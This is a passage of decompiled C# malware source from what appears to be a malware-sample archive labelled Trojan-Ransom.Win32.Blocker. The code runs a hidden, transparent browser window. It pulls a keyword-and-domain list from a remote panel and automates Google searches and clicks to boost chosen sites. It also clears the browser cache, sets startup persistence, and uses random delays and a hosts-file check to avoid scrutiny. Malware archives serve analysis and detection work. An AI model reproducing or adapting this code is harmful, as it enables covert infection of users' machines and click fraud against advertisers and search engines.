private Random rnd = new Random();
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.webBrowser1 = new WebBrowser();
this.SuspendLayout();
this.webBrowser1.Dock = DockStyle.Fill;
this.webBrowser1.IsWebBrowserContextMenuEnabled = false;
this.webBrowser1.Location = new Point(0, 0);
this.webBrowser1.Name = "webBrowser1";
this.webBrowser1.ScriptErrorsSuppressed = true;
this.webBrowser1.Size = new Size(761, 488);
this.webBrowser1.TabIndex = 0;
this.webBrowser1.WebBrowserShortcutsEnabled = false;
this.webBrowser1.DocumentCompleted += new WebBrowserDocumentCompletedEventHandler(this.webBrowser1_DocumentCompleted);
this.webBrowser1.NewWindow += new CancelEventHandler(this.webBrowser1_NewWindow);
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(761, 488);
this.Controls.Add((Control) this.webBrowser1);
this.Name = nameof (Form1);
this.Opacity = 0.0;
this.ShowIcon = false;
this.ShowInTaskbar = false;
this.StartPosition = FormStartPosition.CenterScreen;
this.Load += new EventHandler(this.Form1_Load);
this.ResumeLayout(false);
}
[DllImport("user32.dll")]
public static extern bool SetForegroundWindow(IntPtr hWnd);
[DllImport("user32.dll")]
public static extern int SetWindowLong(IntPtr window, int index, int value);
[DllImport("user32.dll")]
public static extern int GetWindowLong(IntPtr window, int index);
[DllImport("winmm.dll")]
public static extern int sndPlaySound(string lpszSoundName, int uFlags);
[DllImport("wininet.dll", SetLastError = true)]
private static extern bool InternetSetOption(
IntPtr hInternet,
int dwOption,
IntPtr lpBuffer,
int lpdwBufferLength);
public Form1() => this.InitializeComponent();
private void webBrowser1_NewWindow(object sender, CancelEventArgs e) => e.Cancel = true;
private void Basla()
{
this.DeleteCache();
try
{
this.suankisayfa = 1;
KeyValuePair<string, string> keyValuePair = this.kelimelistesi.Dequeue();
this.kelime = keyValuePair.Key;
this.domain = keyValuePair.Value;
while (this.webBrowser1.IsBusy)
Thread.SpinWait(10000);
this.webBrowser1.Navigate("http://www.google.com.tr");
}
catch (InvalidOperationException ex)
{
Environment.Exit(-1);
}
}
private void KelimeleriCek()
{
using (WebClient webClient = new WebClient())
{
string str1 = "";
try
{
str1 = webClient.DownloadString(this.baba);
}
catch (Exception ex)
{
Environment.Exit(-1);
}
string str2 = str1;
char[] chArray = new char[1]{ '\n' };
foreach (string str3 in str2.Split(chArray))
{
string[] strArray = str3.Trim().Split('|');
try
{
string key = strArray[1];
KeyValuePair<string, string> keyValuePair = new KeyValuePair<string, string>(strArray[0], key);
this.gezilenler.Add(key, false);
this.kelimelistesi.Enqueue(keyValuePair);
}
catch
{
}
}
}
}
private void BirineTikla()
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("input"))
{
if (htmlElement.GetAttribute("name").Contains("btnG") || htmlElement.GetAttribute("name").Contains("btnK"))
{
htmlElement.RaiseEvent("onmouseover");
htmlElement.RaiseEvent("onmousedown");
htmlElement.InvokeMember("click");
}
}
}
private void ButonTikla(string attribute, string value)
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("input"))
{
if (htmlElement.GetAttribute(attribute).Contains(value))
{
htmlElement.RaiseEvent("onmouseover");
htmlElement.RaiseEvent("onmousedown");
htmlElement.InvokeMember("click");
}
}
}
private void ButonaTekrarTikla(string attribute, string value)
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("button"))
{
if (htmlElement.GetAttribute(attribute).Contains(value))
{
htmlElement.RaiseEvent("onmouseover");
htmlElement.RaiseEvent("onmousedown");
htmlElement.InvokeMember("click");
}
}
}
private void webBrowser1_DocumentCompleted(
object sender,
WebBrowserDocumentCompletedEventArgs e)
{
string str = e.Url.ToString();
if (str == "http://www.google.com.tr/")
this.SureliIslet((Form1.SureliFonksiyon) (() =>
{
this.TextBoxYaz("name", "q", this.kelime);
this.SureliIslet(new Form1.SureliFonksiyon(this.SubmitForm), 4000, 5000);
}), 2000, 4000);
else if (str.StartsWith("http://www.google.com.tr") && str.Contains("hl=tr"))
{
int suankisayfa = this.suankisayfa;
this.SureliIslet((Form1.SureliFonksiyon) (() =>
{
if (this.LinkeTikla(this.domain))
return;
this.SureliIslet(new Form1.SureliFonksiyon(this.Ilerle), 5000, 12000);
}), 3000, 6000);
}
else
{
if (!str.Contains(this.domain) || str.StartsWith("http://www.google.com"))
return;
this.SureliIslet((Form1.SureliFonksiyon) (() =>
{
if (this.gezilenler[this.domain])
return;
this.gezilenler[this.domain] = true;
this.RastGeleGez();
}), 20000, 50000);
}
}
private void SubmitForm()
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("Form"))
htmlElement.InvokeMember("submit");
}
private void Ilerle()
{
++this.suankisayfa;
foreach (HtmlElement link in this.webBrowser1.Document.Links)
{
if (link.OuterText == this.suankisayfa.ToString() || link.OuterText == this.suankisayfa.ToString() + " ")
{
link.RaiseEvent("onmouseover");
link.RaiseEvent("onmousedown");
link.InvokeMember("click");
}
}
}
private void RastGeleGez()
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
HtmlElementCollection elementsByTagName = this.webBrowser1.Document.GetElementsByTagName("a");
List<HtmlElement> htmlElementList = new List<HtmlElement>(elementsByTagName.Count);
if (elementsByTagName.Count > 0)
{
foreach (HtmlElement htmlElement in elementsByTagName)
{
if (htmlElement.GetAttribute("target") != "_blank" && !string.IsNullOrEmpty(htmlElement.InnerText) && this.NormalLink(htmlElement.GetAttribute("href")))
htmlElementList.Add(htmlElement);
}
if (htmlElementList.Count > 0)
{
htmlElementList[this.rnd.Next(htmlElementList.Count - 1)].RaiseEvent("onmouseover");
htmlElementList[this.rnd.Next(htmlElementList.Count - 1)].RaiseEvent("onmousedown");
htmlElementList[this.rnd.Next(htmlElementList.Count - 1)].InvokeMember("click");
htmlElementList.Clear();
}
}
this.SureliIslet((Form1.SureliFonksiyon) (() => this.SureliIslet(new Form1.SureliFonksiyon(this.Basla), 240001, 241000)), 5000, 6000);
}
private bool NormalLink(string url) => !url.EndsWith("xml") && !url.EndsWith("@") && !url.EndsWith("SetHomePage") && !url.EndsWith("AddFavorite") && !url.EndsWith(".jpg") && !url.EndsWith(".gif") && !url.EndsWith(".png") && !url.EndsWith(".rar") && !url.EndsWith(".zip") && !url.EndsWith(".vcf") && !url.EndsWith(".exe") && !url.EndsWith(".mp3") && !url.EndsWith(".mp4") && !url.EndsWith("mailto");
private void DeleteCache()
{
Process.Start(new ProcessStartInfo()
{
FileName = "RunDll32.exe",
Arguments = "InetCpl.cpl,ClearMyTracksByProcess 1"
}).WaitForExit();
Process.Start(new ProcessStartInfo()
{
FileName = "RunDll32.exe",
Arguments = "InetCpl.cpl,ClearMyTracksByProcess 8"
}).WaitForExit();
Form1.InternetSetOption(IntPtr.Zero, 42, IntPtr.Zero, 0);
}
private void TextBoxYaz(string att, string attname, string attvalue)
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("input"))
{
if (htmlElement.GetAttribute(att).Equals(attname))
htmlElement.SetAttribute("value", attvalue);
}
}
private bool LinkeTikla(string url)
{
bool flag = false;
List<string> stringList = new List<string>();
if (this.webBrowser1.Document != (HtmlDocument) null)
{
foreach (HtmlElement link in this.webBrowser1.Document.Links)
{
string attribute = link.GetAttribute("href");
stringList.Add(attribute);
if (!attribute.Contains("//webcache.googleusercontent.com") && !attribute.Contains("&amp;q=related:") && link.GetAttribute("href").Contains(url))
{
link.RaiseEvent("onmouseover");
link.RaiseEvent("onmousedown");
link.InvokeMember("Click");
flag = true;
break;
}
}
}
return flag;
}
private void SureliIslet(Form1.SureliFonksiyon x, int min, int max)
{
System.Windows.Forms.Timer timer = new System.Windows.Forms.Timer()
{
Interval = this.rnd.Next(min, max)
};
timer.Tick += (EventHandler) ((s, ev) =>
{
x();
((System.Windows.Forms.Timer) s).Stop();
((Component) s).Dispose();
});
timer.Start();
}
private void PanelAyarla()
{
string newValue = "";
WebHeaderCollection headerCollection1 = new WebHeaderCollection();
headerCollection1.Add("User-Agent", "Mozilla/4.0 (compatiple; MSIE 6.0; Windows NT 5.1)");
WebHeaderCollection headerCollection2 = headerCollection1;
using (WebClient webClient = new WebClient()
{
Encoding = Encoding.Default,
Headers = headerCollection2
})
{
try
{
newValue = new Regex("1(.*?)2", RegexOptions.IgnoreCase | RegexOptions.Compiled).Match(webClient.DownloadString(this.ana)).Groups[1].ToString();
}
catch (Exception ex)
{
Environment.Exit(-1);
}
}
this.baba = this.baba.Replace("[DEGISTIR]", newValue);
}
private void Form1_Load(object sender, EventArgs e)
{
this.Size = new Size(this.rnd.Next(1280, 1366), this.rnd.Next(600, 700));
Form1.SetWindowLong(this.Handle, -20, Form1.GetWindowLong(this.Handle, -20) | 128);
this.ieKontrol();
this.PanelAyarla();
this.KelimeleriCek();
Araclar.DisableClickSounds();
this.Basla();
}
private void ieKontrol()
{
if (new WebBrowser().Version.Major < 7)
Environment.Exit(-1);
}
private delegate void SureliFonksiyon();
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/browser_bastan/Program.cs
+46
View File
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: browser_bastan.Program
// Assembly: WinData, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 162322D2-FE3A-45B9-99E4-3519564A1D4D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.exe
using SmartAssembly.MemoryManagement;
using System;
using System.IO;
using System.Threading;
using System.Windows.Forms;
namespace browser_bastan
{
internal static class Program
{
public static Mutex AppMutex = new Mutex(true, "{8F6F0AC4-B9A1-45fd-A8CF-72F04X6FDCCM}");
[STAThread]
private static void Main()
{
MemoryManager.AttachApp();
if (Program.AppMutex.WaitOne(TimeSpan.Zero, true))
{
Program.CheckHostsFile();
string path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\" + Araclar.DstName;
Araclar.DstCheck();
Araclar.Startup(Araclar.Regkeyname, path);
Thread.Sleep(new Random().Next(5000, 60000));
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run((Form) new Form1());
Program.AppMutex.ReleaseMutex();
}
else
Environment.Exit(1);
}
public static void CheckHostsFile()
{
if (!File.ReadAllText(Environment.GetEnvironmentVariable("windir") + "\\system32\\drivers\\etc\\hosts").Contains("nurullahuzmez.com"))
return;
Environment.Exit(1);
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/{b9141284-224a-4b92-8f0a-8b542563c270}
BIN
View File
Binary file not shown.